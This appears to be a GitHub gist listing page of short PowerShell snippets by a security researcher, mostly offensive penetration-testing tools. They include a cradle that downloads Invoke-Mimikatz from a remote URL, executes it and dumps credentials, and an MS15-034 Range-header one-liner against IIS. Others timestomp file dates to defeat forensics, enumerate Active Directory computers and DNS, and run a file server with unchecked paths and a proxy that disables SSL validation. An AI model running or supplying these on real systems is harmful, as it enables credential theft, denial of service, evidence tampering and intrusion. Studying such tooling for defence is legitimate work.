Skip to content

Instantly share code, notes, and snippets.

View obscuresec's full-sized avatar

Chris Campbell obscuresec

176 followers · 0 following
View GitHub Profile
@obscuresec
obscuresec / base64padding.ps1
Created April 15, 2015 17:58
Base64 Padding in PowerShell
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
@obscuresec
obscuresec / ms15-034.cmd
Created April 15, 2015 18:14
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
@obscuresec
obscuresec / dirtywebserver.ps1
Created May 18, 2014 15:36
Dirty PowerShell Webserver
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
$HRes.OutputStream.Write($Buf,0,$Buf.Length)
@obscuresec
obscuresec / gist:7b0cf71d7a8dd5e7b54c
Created May 20, 2014 00:28
PowerShell TimeStomp
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@obscuresec
obscuresec / gist:bd30a8431ee4bc32f1cd
Created May 18, 2014 21:34
powershell.exe -com '([adsisearcher]'objectCategory=Computer').Findall() | ForEach {$_.properties.cn}'
@obscuresec
obscuresec / psproxy.ps1
Created May 19, 2014 01:17
Simple but dirty Powershell web proxy
#simple and dirty proxy
#usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com
$Up = "http://+:8000/"
$Hso = New-Object Net.HttpListener
$Wco = New-Object Net.Webclient
#ignore self-signed/invalid ssl certs
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)}
@obscuresec
obscuresec / gist:25e8a142eb08bf237799
Last active October 4, 2018 08:03
Touch for PowerShell
function Set-MacAttribute {
<#
.SYNOPSIS
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input.
PowerSploit Function: Set-MacAttribute
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
@obscuresec
obscuresec / Get-AdDnsRecords
Last active August 27, 2016 03:42
Get-AdDnsRecords
function Get-ADDNSRecords {
<#
update of dns-dump.ps1 by Michael B. Smith
michael at smithcons dot com
https://github.com/mmessano/PowerShell/blob/master/dns-dump.ps1
#>
Param(
[string]$zone = "$env:USERDNSDOMAIN",
[string]$dc = "$(($env:LOGONSERVER).trim('\'))"
)
@obscuresec
obscuresec / gist:f24832d8b02288ab6532
Created May 20, 2014 18:46
Testing Invoke-Mimikatz
$wc=new-object net.webclient
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $im
invoke-mimikatz -DumpCreds
@obscuresec
obscuresec / gist:eb46bc1094cd6003a12d
Created April 15, 2015 15:38
test-ms15034.ps1
function Test-MS15034($url) {
try {
$wr = [Net.WebRequest]::Create($url)
$wr.AddRange('bytes',18,18446744073709551615)
$res = $wr.GetResponse()
$status = $res.statuscode
Write-Output "$status means it is not vulnerable"
$res.Close()
}catch {
if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"}